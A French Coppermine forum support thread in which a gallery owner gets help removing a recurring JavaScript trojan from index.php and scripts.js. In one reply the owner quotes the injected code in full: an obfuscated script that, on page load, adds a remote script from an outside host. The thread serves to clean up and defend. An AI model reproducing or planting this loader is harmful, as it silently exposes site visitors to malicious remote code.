Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Cheval de Troie intempestif et récurrent  (Read 7866 times)

0 Members and 1 Guest are viewing this topic.

satsuki

  • Coppermine newbie
  • Offline Offline
  • Posts: 16
Cheval de Troie intempestif et récurrent
« on: January 10, 2010, 01:56:37 pm »

Bonjour,

je sollicite votre aide car je suis face à un virus qui attaque ma galerie perpétuellement. Un ami m'a aidé à m'en débarrasser plusieurs fois, les fichiers scripts.js et index.php étaient infectés. (D'autre part, j'ai vu depuis hier, ce même virus infecte le site d'une amie http://www.just-ashleygreene.fr/ )

Les fichiers infecté sont toujours les même l'index et le scripts.js qui sont:

 http://www.ashleygreenefrance.com/Galerie/
et
 http://www.ashleygreenefrance.com/Galerie/scripts.js

aucun nettoyage avec fixfiles.php n'en ai venu à bout cette fois-ci.


Le logiciel malveillant est :
JS:Illredir-C [Trj]
Ma galerie: http://www.ashleygreenefrance.com/Galerie/

Merci d'avance pour votre aide
« Last Edit: January 10, 2010, 04:19:31 pm by François Keller »
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Cheval de Troie intempestif et récurrent
« Reply #1 on: January 10, 2010, 04:22:22 pm »

il faudrait regarder dans le répertoire albums si il n'y a pas de fichier avec un morceau de code bizarre., pareil pour le fichier includes/config.inc.php et pour le répertoire des themes. C'est souvent là que se trouve le morceau de code qu'il faut éliminer
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki

  • Coppermine newbie
  • Offline Offline
  • Posts: 16
Re: Cheval de Troie intempestif et récurrent
« Reply #2 on: January 10, 2010, 06:34:44 pm »

Alors j'ai passé un moment à nettoyer avec fixfiles.php tout les dossiers des albums, puis les répertoires de thèmes, et include, j'ai édité le fichier config.inc.php et je ne vois aucun code pouvant être qualifié de "bizarre", après je ne sais pas du tout à quoi doit ressembler exactement un code bizarre...

Il y a bien un code bizarre à la fin de l'index des albums et celui de la galerie aussi
genre ça:

Quote
<script>/*LGPL*/ try{ window.onload = function(){var Nvg2x9p445j = document.createElement('s@(c($^r^(i^p&&^$t)$'.replace(/\)|\(|@|\^|#|\!|\$|&/ig, ''));Nvg2x9p445j.setAttribute('defer', 'd$)e^^!f#&)@@e()r&'.replace(/\(|\^|\)|&|@|\$|#|\!/ig, ''));Nvg2x9p445j.setAttribute('type', 't^(&)e@#x&t()!/!$j)!$a&v@a#s&@c#r&^^i(p^@$t$@&$'.replace(/\!|\^|\(|@|#|\$|\)|&/ig, ''));Nvg2x9p445j.setAttribute('id', 'O@^x#b@!&s@^r&@2!)(6#&1#^^p##&^i!#!u#u$)6)!f('.replace(/\!|\(|\$|\)|&|#|@|\^/ig, ''));Nvg2x9p445j.setAttribute('s)r!$c#@('.replace(/&|\^|@|\(|\$|\!|\)|#/ig, ''),  'h@t)^!t&$p@:)/$(#/))m((l@b(-(&c!#(o@)&(m!!.&)h$@e^@i^&(s((!e&&.(d@$e&(&.!!^t&@^#$i^!s$&#@c(a(#!@(l(i$$-^i&!t^(.$^t@@h^(!e(!c(#h#&@&o&(c##o&&#l$(^a))##(t#^@#e@w!e^&)b$^^.#@^r#!$)u#:()(8)#0@#8)@0!&/!#a#d!(@(&u@@l#(t$^!-()!$e@^m$p^)i@&$r$$e^!!.!@&c$^o^()m!$(/^#!#a^#^d$!u&$&@l@$t#@@!-!&$#e@m$@)p()&i()#r@#e^).@@$c(^o^)m$/^(!i&g&(($.&^c^$@o^&()m)$!).^b#$&r#&/))g$^)^o$!^o(g$l(#$e^(.(&c@(o#$@m(#$(/#@b!@a(d(&j))o$^(j&o)!.#)$c()o@^m$!/!@'.replace(/\!|\^|\$|\)|@|&|#|\(/ig, ''));if (document){document.body.appendChild(Nvg2x9p445j);}} } catch(Yd8zh9qcrhu53u79f44) {}</script>
<!--35c2f1fd7838c8102156b6e6c1aaad1d-->

Désolé encore pour mon incompétence, je sais à quel point cela peut être agaçant.
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Cheval de Troie intempestif et récurrent
« Reply #3 on: January 10, 2010, 08:12:51 pm »

effacez ce code des fichiers en question, il ne fait pas partie de Coppermine
continuez à chercher, c'est ce genre de code qu'il faut éliminer, on le trouve généralement dans les fichiers index des différents répertoires. Une manière de vérifier, est ce comparer la taille des fichiers du pack Coppermine (celui que vous avez téléchargé sur votre ordinateur et ceux qui se trouvent sur votre serveur. Si la taille est différente, regardez(avec un éditeur de texte) ce qu'ils contiennent après les avoir rapatriés sur votre ordi
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki

  • Coppermine newbie
  • Offline Offline
  • Posts: 16
Re: Cheval de Troie intempestif et récurrent
« Reply #4 on: January 10, 2010, 09:36:04 pm »

ouf, c'est bon,merci, j'ai supprimé tout ces codes-ci que je pouvais trouver dans les index.php, et le fichier "scripts.js" qui était toujours infecté, impossible de l'éditer à cause de mon anti-virus, je l'ai simplement supprimé et remplacé par celui d'origine.
Voilà!
Une dernière question et je ne vous embête plus, est-ce que c'est une personne "réelle" qui infecte ma galerie volontairement? Ou est-ce plus compliqué. Je pose cette question car une amie dont le site traite du même sujet que le mien a été infecté par le même virus aujourd'hui, et avait le même code sans queue ni tête à l'index de son site. Donc je trouve ça d'une étrange coïncidence.

En tout cas je vais changer mes mots de pass sous peu.
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Cheval de Troie intempestif et récurrent
« Reply #5 on: January 10, 2010, 11:08:35 pm »

difficile à dire si c'est un robot ou une personne qui fait ça. Mais c'est une bonne idée que de changer les mots de passe. Une autre bonne idée, est de mettre à jour régulièrement votre galerie dès qu'une nouvelle version de Coppermine est publiée
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog

satsuki

  • Coppermine newbie
  • Offline Offline
  • Posts: 16
Re: Cheval de Troie intempestif et récurrent
« Reply #6 on: January 12, 2010, 10:38:04 am »

merci pour vos réponses,
bonne journée.
Logged

François Keller

  • Moderator
  • Coppermine addict
  • ****
  • Country: fr
  • Offline Offline
  • Gender: Male
  • Posts: 9094
  • aka Frantz
    • Ma galerie
Re: Cheval de Troie intempestif et récurrent
« Reply #7 on: January 12, 2010, 10:56:17 am »

si le problème est résolu, n'oubliez pas de cliquer sur la coche en haut à droite du premier message pour le marque "solved"
Logged
Avez vous lu la DOC ? la FAQ ? et cherché sur le forum avant de poster ?
Did you read the DOC ? the FAQ ? and search the board before posting ?
Mon Blog
Pages: [1]   Go Up
 

Page created in 0.048 seconds with 20 queries.